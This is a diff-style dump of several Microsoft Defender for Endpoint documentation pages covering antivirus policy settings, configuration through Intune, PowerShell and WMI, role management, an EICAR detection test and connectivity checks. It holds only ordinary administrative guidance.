-|Remediation|Specify the day of the week to run a scheduled full scan to complete remediation|[Configure scheduled Microsoft Defender Antivirus scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md)|
-|Remediation|Specify the time of day to run a scheduled full scan to complete remediation|[Configure scheduled Microsoft Defender Antivirus scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md)|
-|Reporting|Turn off enhanced notifications|[Configure the notifications that appear on endpoints](configure-notifications-microsoft-defender-antivirus.md)
-|Root|Turn off Microsoft Defender Antivirus|Not used. If you're using or planning to use a non-Microsoft antivirus product, see [Microsoft Defender Antivirus compatibility with other security products](microsoft-defender-antivirus-compatibility.md).|
-|Root|Define addresses to bypass proxy server|[Configure device proxy and Internet connectivity settings](configure-proxy-internet.md#configure-a-static-proxy-for-microsoft-defender-antivirus)|
-|Root|Define proxy autoconfig (.pac) for connecting to the network|[Configure device proxy and Internet connectivity settings](configure-proxy-internet.md#configure-a-static-proxy-for-microsoft-defender-antivirus)|
-|Root|Define proxy server for connecting to the network|[Configure device proxy and Internet connectivity settings](configure-proxy-internet.md#configure-a-static-proxy-for-microsoft-defender-antivirus)|
-|Root|Configure local administrator merge behavior for lists|[Prevent or allow users to locally modify policy settings](configure-local-policy-overrides-microsoft-defender-antivirus.md)|
-|Root|Allow antimalware service to start up with normal priority|[Configure remediation for Microsoft Defender Antivirus scans](configure-remediation-microsoft-defender-antivirus.md)|
-|Root|Allow antimalware service to remain running always|[Configure remediation for Microsoft Defender Antivirus scans](configure-remediation-microsoft-defender-antivirus.md)|
-|Root|Turn off routine remediation|[Configure remediation for Microsoft Defender Antivirus scans](configure-remediation-microsoft-defender-antivirus.md)|
-|Root|Randomize scheduled task times|[Configure scheduled scans for Microsoft Defender Antivirus](scheduled-catch-up-scans-microsoft-defender-antivirus.md)|
-|Scan|Allow users to pause scan|[Prevent users from seeing or interacting with the Microsoft Defender Antivirus user interface](prevent-end-user-interaction-microsoft-defender-antivirus.md) (Not supported on Windows 10)|
-|Scan|Check for the latest virus and spyware definitions before running a scheduled scan|[Manage event-based forced updates](manage-event-based-updates-microsoft-defender-antivirus.md)|
-|Scan|Define the number of days after which a catch-up scan is forced|[Manage updates for endpoints that are out of date](manage-outdated-endpoints-microsoft-defender-antivirus.md)|
-|Scan|Turn on catch up full scan|[Manage updates for endpoints that are out of date](manage-outdated-endpoints-microsoft-defender-antivirus.md)|
-|Scan|Turn on catch up quick scan|[Manage updates for endpoints that are out of date](manage-outdated-endpoints-microsoft-defender-antivirus.md)|
-|Scan|Configure local setting override for maximum percentage of CPU utilization|[Prevent or allow users to locally modify policy settings](configure-local-policy-overrides-microsoft-defender-antivirus.md)|
-|Scan|Configure local setting override for schedule scan day|[Prevent or allow users to locally modify policy settings](configure-local-policy-overrides-microsoft-defender-antivirus.md)|
-|Scan|Configure local setting override for scheduled quick scan time|[Prevent or allow users to locally modify policy settings](configure-local-policy-overrides-microsoft-defender-antivirus.md)|
-|Scan|Configure local setting override for scheduled scan time|[Prevent or allow users to locally modify policy settings](configure-local-policy-overrides-microsoft-defender-antivirus.md)|
-|Scan|Configure local setting override for the scan type to use for a scheduled scan|[Prevent or allow users to locally modify policy settings](configure-local-policy-overrides-microsoft-defender-antivirus.md)|
-|Scan|Create a system restore point|[Configure remediation for Microsoft Defender Antivirus scans](configure-remediation-microsoft-defender-antivirus.md)|
-|Scan|Turn on removal of items from scan history folder|[Configure remediation for Microsoft Defender Antivirus scans](configure-remediation-microsoft-defender-antivirus.md)|
-|Scan|Turn on heuristics|[Enable and configure Microsoft Defender Antivirus always-on protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md)|
-|Scan|Turn on e-mail scanning|[Configure scanning options in Microsoft Defender Antivirus](configure-advanced-scan-types-microsoft-defender-antivirus.md)|
-|Scan|Turn on reparse point scanning|[Configure scanning options in Microsoft Defender Antivirus](configure-advanced-scan-types-microsoft-defender-antivirus.md)|
-|Scan|Run full scan on mapped network drives|[Configure scanning options in Microsoft Defender Antivirus](configure-advanced-scan-types-microsoft-defender-antivirus.md)|
-|Scan|Scan archive files|[Configure scanning options in Microsoft Defender Antivirus](configure-advanced-scan-types-microsoft-defender-antivirus.md)|
-|Scan|Scan network files|[Configure scanning options in Microsoft Defender Antivirus](configure-advanced-scan-types-microsoft-defender-antivirus.md)|
-|Scan|Scan packed executables|[Configure scanning options in Microsoft Defender Antivirus](configure-advanced-scan-types-microsoft-defender-antivirus.md)|
-| Scan | Scan scripts | [Configure scanning options in Microsoft Defender Antivirus](configure-advanced-scan-types-microsoft-defender-antivirus.md) <p>Also see [Defender/AllowScriptScanning](/windows/client-management/mdm/policy-csp-defender).|
-|Scan|Scan removable drives|[Configure scanning options in Microsoft Defender Antivirus](configure-advanced-scan-types-microsoft-defender-antivirus.md)|
-|Scan|Specify the maximum depth to scan archive files|[Configure scanning options in Microsoft Defender Antivirus](configure-advanced-scan-types-microsoft-defender-antivirus.md)|
-|Scan|Specify the maximum percentage of CPU utilization during a scan|[Configure scanning options in Microsoft Defender Antivirus](configure-advanced-scan-types-microsoft-defender-antivirus.md)|
-|Scan|Specify the maximum size of archive files to be scanned|[Configure scanning options in Microsoft Defender Antivirus](configure-advanced-scan-types-microsoft-defender-antivirus.md)|
-|Scan|Specify the day of the week to run a scheduled scan|[Configure scheduled scans for Microsoft Defender Antivirus](scheduled-catch-up-scans-microsoft-defender-antivirus.md)|
-|Scan|Specify the interval to run quick scans per day|[Configure scheduled scans for Microsoft Defender Antivirus](scheduled-catch-up-scans-microsoft-defender-antivirus.md)|
-|Scan|Specify the scan type to use for a scheduled scan|[Configure scheduled scans for Microsoft Defender Antivirus](scheduled-catch-up-scans-microsoft-defender-antivirus.md)|
-|Scan|Specify the time for a daily quick scan|[Configure scheduled scans for Microsoft Defender Antivirus](scheduled-catch-up-scans-microsoft-defender-antivirus.md)|
-|Scan|Specify the time of day to run a scheduled scan|[Configure scheduled scans for Microsoft Defender Antivirus](scheduled-catch-up-scans-microsoft-defender-antivirus.md)|
-|Scan|Start the scheduled scan only when computer is on but not in use|[Configure scheduled scans for Microsoft Defender Antivirus](scheduled-catch-up-scans-microsoft-defender-antivirus.md)|
-|Security intelligence updates|Allow security intelligence updates from Microsoft Update|[Manage updates for mobile devices and virtual machines (VMs)](manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md)|
-|Security intelligence updates|Allow security intelligence updates when running on battery power|[Manage updates for mobile devices and virtual machines (VMs)](manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md)|
-|Security intelligence updates|Allow notifications to disable definitions-based reports to Microsoft MAPS|[Manage event-based forced updates](manage-event-based-updates-microsoft-defender-antivirus.md)|
-|Security intelligence updates|Allow real-time security intelligence updates based on reports to Microsoft MAPS|[Manage event-based forced updates](manage-event-based-updates-microsoft-defender-antivirus.md)|
-|Security intelligence updates|Check for the latest virus and spyware definitions on startup|[Manage event-based forced updates](manage-event-based-updates-microsoft-defender-antivirus.md)|
-|Security intelligence updates|Define file shares for downloading security intelligence updates|[Manage Microsoft Defender Antivirus protection and security intelligence updates](manage-protection-updates-microsoft-defender-antivirus.md)|
-|Security intelligence updates|Define the number of days after which a catch up security intelligence update is required|[Manage updates for endpoints that are out of date](manage-outdated-endpoints-microsoft-defender-antivirus.md)|
-|Security intelligence updates|Define the number of days before spyware definitions are considered out of date|[Manage updates for endpoints that are out of date](manage-outdated-endpoints-microsoft-defender-antivirus.md)|
-|Security intelligence updates|Define the number of days before virus definitions are considered out of date|[Manage updates for endpoints that are out of date](manage-outdated-endpoints-microsoft-defender-antivirus.md)|
-|Security intelligence updates|Define the order of sources for downloading security intelligence updates|[Manage Microsoft Defender Antivirus protection and security intelligence updates](manage-protection-updates-microsoft-defender-antivirus.md)|
-|Security intelligence updates|Initiate security intelligence update on startup|[Manage event-based forced updates](manage-event-based-updates-microsoft-defender-antivirus.md)|
-|Security intelligence updates|Specify the day of the week to check for security intelligence updates|[Manage when protection updates should be downloaded and applied](manage-protection-update-schedule-microsoft-defender-antivirus.md)|
-|Security intelligence updates|Specify the interval to check for security intelligence updates|[Manage when protection updates should be downloaded and applied](manage-protection-update-schedule-microsoft-defender-antivirus.md)|
-|Security intelligence updates|Specify the time to check for security intelligence updates|[Manage when protection updates should be downloaded and applied](manage-protection-update-schedule-microsoft-defender-antivirus.md)|
-|Security intelligence updates|Turn on scan after Security intelligence update|[Configure scheduled scans for Microsoft Defender Antivirus](scheduled-catch-up-scans-microsoft-defender-antivirus.md)|
-|Threats|Specify threat alert levels at which default action should not be taken when detected|[Configure remediation for Microsoft Defender Antivirus scans](configure-remediation-microsoft-defender-antivirus.md)|
-|Threats|Specify threats upon which default action should not be taken when detected|[Configure remediation for Microsoft Defender Antivirus scans](configure-remediation-microsoft-defender-antivirus.md)|
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-> [!TIP]
-> **Performance tip** Due to a variety of factors (examples listed below) Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's **Performance analyzer** is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues; some examples are:
->
-> - Top paths that impact scan time
-> - Top files that impact scan time
-> - Top processes that impact scan time
-> - Top file extensions that impact scan time
-> - Combinations ΓÇô for example:
-> - top files per extension
-> - top paths per extension
-> - top processes per path
-> - top scans per file
-> - top scans per file per process
->
-> You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions.
-> See: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
-
-## See also
--- [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)-- [Reference topics for management and configuration tools](configuration-management-reference-microsoft-defender-antivirus.md)-- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)-
security Use Intune Config Manager Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/use-intune-config-manager-microsoft-defender-antivirus.md
- Title: Configure Microsoft Defender Antivirus using Microsoft Intune
-description: Use Microsoft Intune to configure Microsoft Defender Antivirus and Endpoint Protection
---- Previously updated : 12/16/2021------- m365-security-- tier2-- mde-ngp--
-# Use Microsoft Intune to configure and manage Microsoft Defender Antivirus
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-You can use the Microsoft Intune family of products to configure Microsoft Defender Antivirus scans, like [Microsoft Intune](/mem/intune/fundamentals/what-is-intune) and [Configuration Manager](/mem/configmgr/core/understand/introduction).
-
-## Configure Microsoft Defender Antivirus scans in Intune
-
-1. Go to the Microsoft Intune admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)), and sign in.
-
-2. Navigate to **Endpoint Security**.
-
-3. Under **Manage**, choose **Antivirus**.
-
-4. Select your Microsoft Defender Antivirus policy.
-
-5. Under **Manage**, choose **Properties**.
-
-1. Next to **Configuration settings**, choose **Edit**.
-
- > [!IMPORTANT]
- > AllowIntrusionPreventionSystem antivirus settings is officially being deprecated and as such cannot be configured.
-7. Expand the **Scan** section, and review or edit your scanning settings.
-
-8. Choose **Review + save**.
-
-> [!TIP]
-> Need help? See [Manage endpoint security in Microsoft Intune](/mem/intune/protect/endpoint-security).
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## Related articles
--- [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)-- [Reference articles for management and configuration tools](configuration-management-reference-microsoft-defender-antivirus.md)-- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)-
-> [!TIP]
-> **Performance tip** Due to a variety of factors (examples listed below) Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's **Performance analyzer** is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues; some examples are:
->
-> - Top paths that impact scan time
-> - Top files that impact scan time
-> - Top processes that impact scan time
-> - Top file extensions that impact scan time
-> - Combinations ΓÇô for example:
-> - top files per extension
-> - top paths per extension
-> - top processes per path
-> - top scans per file
-> - top scans per file per process
->
-> You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions.
-> See: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
security Use Powershell Cmdlets Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/use-powershell-cmdlets-microsoft-defender-antivirus.md
- Title: Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus
-description: In Windows 10 and Windows 11, you can use PowerShell cmdlets to run scans, update Security intelligence, and change settings in Microsoft Defender Antivirus.
---- Previously updated : 02/18/2024------- m365-security-- tier2-- mde-ngp--
-# Use PowerShell cmdlets to configure and manage Microsoft Defender Antivirus
-
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-You can use PowerShell to perform various functions in Microsoft Defender Antivirus. Similar to the command prompt or command line, PowerShell is a task-based command-line shell and scripting language designed especially for system administration. You can read more about it in the [PowerShell documentation](/powershell/scripting/overview).
-
-For a list of the cmdlets and their functions and available parameters, see the [Microsoft Defender Antivirus cmdlets](/powershell/module/defender) topic.
-
-PowerShell cmdlets are most useful in Windows Server environments that don't rely on a graphical user interface (GUI) to configure software.
-
-> [!NOTE]
-> PowerShell cmdlets should not be used as a replacement for a full network policy management infrastructure, such as [Microsoft Endpoint Configuration Manager](/configmgr), [Group Policy Management Console](use-group-policy-microsoft-defender-antivirus.md), or [Microsoft Defender Antivirus Group Policy ADMX templates](/troubleshoot/windows-client/group-policy/create-and-manage-central-store).
-
-Changes made with PowerShell will affect local settings on the endpoint where the changes are deployed or made. This means that deployments of policy with Microsoft Defender for Endpoint security settings management, Microsoft Intune, Microsoft Configuration Manager Tenant Attach, or Group Policy can overwrite changes made with PowerShell.
-
-You can [configure which settings can be overridden locally with local policy overrides](configure-local-policy-overrides-microsoft-defender-antivirus.md).
-
-PowerShell is typically installed under the folder `%SystemRoot%\system32\WindowsPowerShell`.
-
-## Use Microsoft Defender Antivirus PowerShell cmdlets
-
-1. In the Windows search bar, type **powershell**.
-2. Select **Windows PowerShell** from the results to open the interface.
-3. Enter the PowerShell command and any parameters.
-
-> [!NOTE]
-> You may need to open PowerShell in administrator mode. Right-click the item in the Start menu, click **Run as administrator** and click **Yes** at the permissions prompt.
-
-To open online help for any of the cmdlets type the following:
-
-```PowerShell
-Get-Help <cmdlet> -Online
-```
-
-Omit the `-online` parameter to get locally cached help.
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-> [!TIP]
-> **Performance tip** Due to a variety of factors (examples listed below) Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's **Performance analyzer** is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues; some examples are:
->
-> - Top paths that impact scan time
-> - Top files that impact scan time
-> - Top processes that impact scan time
-> - Top file extensions that impact scan time
-> - Combinations ΓÇô for example:
-> - top files per extension
-> - top paths per extension
-> - top processes per path
-> - top scans per file
-> - top scans per file per process
->
-> You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions.
-> See: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
-
-## Related topics
--- [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)-- [Reference topics for management and configuration tools](configuration-management-reference-microsoft-defender-antivirus.md)-- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)-- [Microsoft Defender Antivirus Cmdlets](/powershell/module/defender)
security Use Wmi Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/use-wmi-microsoft-defender-antivirus.md
- Title: Configure Microsoft Defender Antivirus with WMI
-description: Learn how to configure and manage Microsoft Defender Antivirus by using WMI scripts to retrieve, modify, and update settings in Microsoft Defender for Endpoint.
---- Previously updated : 10/18/2018------- m365-security-- tier3-- mde-ngp--
-# Use Windows Management Instrumentation (WMI) to configure and manage Microsoft Defender Antivirus
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-Windows Management Instrumentation (WMI) is a scripting interface that allows you to retrieve, modify, and update settings.
-
-Read more about WMI at the [Microsoft Developer Network System Administration library](/windows/win32/wmisdk/wmi-start-page).
-
-Microsoft Defender Antivirus has a number of specific WMI classes that can be used to perform most of the same functions as Group Policy and other management tools. Many of the classes are analogous to [Defender for Cloud PowerShell cmdlets](use-powershell-cmdlets-microsoft-defender-antivirus.md).
-
-The [MSDN Windows Defender WMIv2 Provider reference library](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal) lists the available WMI classes for Microsoft Defender Antivirus, and includes example scripts.
-
-Changes made with WMI will affect local settings on the endpoint where the changes are deployed or made. This means that deployments of policy with Group Policy, Microsoft Endpoint Configuration Manager, or Microsoft Intune can overwrite changes made with WMI.
-
-You can [configure which settings can be overridden locally with local policy overrides](configure-local-policy-overrides-microsoft-defender-antivirus.md).
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-> [!TIP]
-> **Performance tip** Due to a variety of factors (examples listed below) Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's **Performance analyzer** is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues; some examples are:
->
-> - Top paths that impact scan time
-> - Top files that impact scan time
-> - Top processes that impact scan time
-> - Top file extensions that impact scan time
-> - Combinations ΓÇô for example:
-> - top files per extension
-> - top paths per extension
-> - top processes per path
-> - top scans per file
-> - top scans per file per process
->
-> You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions.
-> See: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
->
-
-## Related topics
--- [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)-- [Reference topics for management and configuration tools](configuration-management-reference-microsoft-defender-antivirus.md)-- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security User Roles https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/user-roles.md
- Title: Create and manage roles for role-based access control
-description: Create roles and define the permissions assigned to the role as part of the role-based access control implementation in the Microsoft Defender XDR
------- m365-security-- tier2-- Previously updated : 12/18/2020--
-# Create and manage roles for role-based access control
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-roles-abovefoldlink)
--
-<a name='create-roles-and-assign-the-role-to-an-azure-active-directory-group'></a>
-
-## Create roles and assign the role to a Microsoft Entra group
-
-The following steps guide you on how to create roles in Microsoft Defender XDR. It assumes that you have already created Microsoft Entra user groups.
-
-1. Log in to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> using account with a Security administrator or Global administrator role assigned.
-
-2. In the navigation pane, select **Settings** \> **Endpoints** \> **Roles** (under **Permissions**).
-
-3. Select **Add item**.
-
-4. Enter the role name, description, and permissions you'd like to assign to the role.
-
-5. Select **Next** to assign the role to a Microsoft Entra Security group.
-
-6. Use the filter to select the Microsoft Entra group that you'd like to add to this role to.
-
-7. **Save and close**.
-
-8. Apply the configuration settings.
-
-> [!IMPORTANT]
-> After creating roles, you'll need to create a device group and provide access to the device group by assigning it to a role that you just created.
-
-> [!NOTE]
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-### Permission options
--- **View data**
- - **Security operations** - View all security operations data in the portal
- - **Defender Vulnerability Management** - View Defender Vulnerability Management data in the portal
--- **Active remediation actions**
- - **Security operations** - Take response actions, approve or dismiss pending remediation actions, manage allowed/blocked lists for automation and indicators
- - **Defender Vulnerability Management - Exception handling** - Create new exceptions and manage active exceptions
- - **Defender Vulnerability Management - Remediation handling** - Submit new remediation requests, create tickets, and manage existing remediation activities
- - **Defender Vulnerability Management - Application handling** - Apply immediate mitigation actions by blocking vulnerable applications, as part of the remediation activity and manage the blocked apps and perform unblock actions
--- **Security baselines**
- - **Defender Vulnerability Management ΓÇô Manage security baselines assessment profiles** - Create and manage profiles so you can assess if your devices comply to security industry baselines.
--- **Alerts investigation** - Manage alerts, initiate automated investigations, run scans, collect investigation packages, manage device tags, and download only portable executable (PE) files--- **Manage portal system settings** - Configure storage settings, SIEM and threat intel API settings (applies globally), advanced settings, automated file uploads, roles and device groups-
- > [!NOTE]
- > This setting is only available in the Microsoft Defender for Endpoint administrator (default) role.
--- **Manage security settings in Security Center** - Configure alert suppression settings, manage folder exclusions for automation, onboard and offboard devices, manage email notifications, manage evaluation lab, and manage allowed/blocked lists for indicators--- **Live response capabilities**
- - **Basic** commands:
- - Start a live-response session
- - Perform read-only live-response commands on remote device (excluding file copy and execution)
- - Download a file from the remote device via live response
- - **Advanced** commands:
- - Download PE and non-PE files from the file page
- - Upload a file to the remote device
- - View a script from the files library
- - Execute a script on the remote device from the files library
-
-For more information on the available commands, see [Investigate devices using Live response](live-response.md).
-
-## Edit roles
-
-1. Log in to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> using account with Security administrator or Global administrator role assigned.
-
-2. In the navigation pane, select **Settings** \> **Endpoints** \> **Roles** (under **Permissions**).
-
-3. Select the role you'd like to edit.
-
-4. Click **Edit**.
-
-5. Modify the details or the groups that are assigned to the role.
-
-6. Click **Save and close**.
-
-## Delete roles
-
-1. Log in to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> using account with Security administrator or Global administrator role assigned.
-
-2. In the navigation pane, select **Settings** \> **Endpoints** \> **Roles** (under **Permissions**).
-
-3. Select the role you'd like to delete.
-
-4. Click the drop-down button and select **Delete role**.
-
-## Related topic
--- [User basic permissions to access the portal](basic-permissions.md)-- [Create and manage device groups](machine-groups.md)
security Validate Antimalware https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/validate-antimalware.md
- Title: AV detection test for verifying device's onboarding and reporting services
-description: AV detection test to verify the device's proper onboarding and reporting to the service.
------- m365-security-- tier3-- mde-macos--- Previously updated : 01/31/2024--
-# AV detection test for verifying device's onboarding and reporting services
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)--- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)--- [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md)--- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)-
-Scenario requirements and setup
--- Windows 11, Windows 10, Windows 8.1, Windows 7 SP1--- Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012, and Windows Server 2008 R2--- Linux--- macOS--- Microsoft Defender Real-time protection is enabled-
-## EICAR test file to simulate malware
-
-After you enable Microsoft Defender for Endpoint or Microsoft Defender for Business or Microsoft Defender Antivirus, you can test the service and run a proof of concept to familiarize yourself with its feature and validate the advanced security capabilities effectively protect your device by generating real security alerts.
-
-Run an AV detection test to verify that the device is properly onboarded and reporting to the service. Perform the following steps on the newly onboarded device:
-
-### Windows
-
-1. Prepare for the EICAR test file:
-
- 1. Use an EICAR test file instead of real malware to avoid causing damage. Microsoft Defender Antivirus treats EICAR test files as malware.
-
-1. Create the EICAR test file:
-
- 1. Copy the following string: `X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*`
-
- 1. Paste the string into a .TXT file and save it as EICAR.txt
-
-### Linux/macOS
-
-1. Ensure that real-time protection is enabled (denoted by a result of 1 from running the following command):
-
-```bash
-mdatp health --field real_time_protection_enabled
-```
-
-1. Open a Terminal window. Copy and execute the following command:
-
-
-Linux
--
-```bash
-curl -o ~/tmp/eicar.com.txt https://secure.eicar.org/eicar.com.txt
-```
-
-macOS
--
-```bash
-curl -o ~/Downloads/eicar.com.txt https://secure.eicar.org/eicar.com.txt
-```
-
-3. The file has been quarantined by Defender for Endpoint on Mac. Use the following command to list all the detected threats:
-
-```bash
-mdatp threat list
-```
security Verify Connectivity https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/verify-connectivity.md
- Title: Verify client connectivity to Microsoft Defender for Endpoint service URLs
-description: Learn how to verify client connectivity to Defender for Endpoint service URLs
-------- m365-security-- tier1-- Previously updated : 09/19/2023---
-# STEP 3: Verify client connectivity to Microsoft Defender for Endpoint service URLs
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://www.microsoft.com/WindowsForBusiness/windows-atp?ocid=docs-wdatp-configureendpointsscript-abovefoldlink)
---
-Check that clients are able to connect to the Defender for Endpoint service URLs using the Defender for Endpoint Client Analyzer to ensure that endpoints are able to communicate telemetry to the service.
-
-For more information on the Defender for Endpoint Client Analyzer, see [Troubleshoot sensor health using Microsoft Defender for Endpoint Client Analyzer](overview-client-analyzer.md).
-
-> [!NOTE]
-> You can run the Defender for Endpoint Client Analyzer on devices prior to onboarding and after onboarding.
-> - When testing on a device onboarded to Defender for Endpoint, the tool will use the onboarding parameters. <br>
-> - When testing on a device not yet onboarded to Defender for Endpoint, the tool will use the defaults of US, UK, and EU.
--
-> [!NOTE]
-> (Applies to public preview)<br>
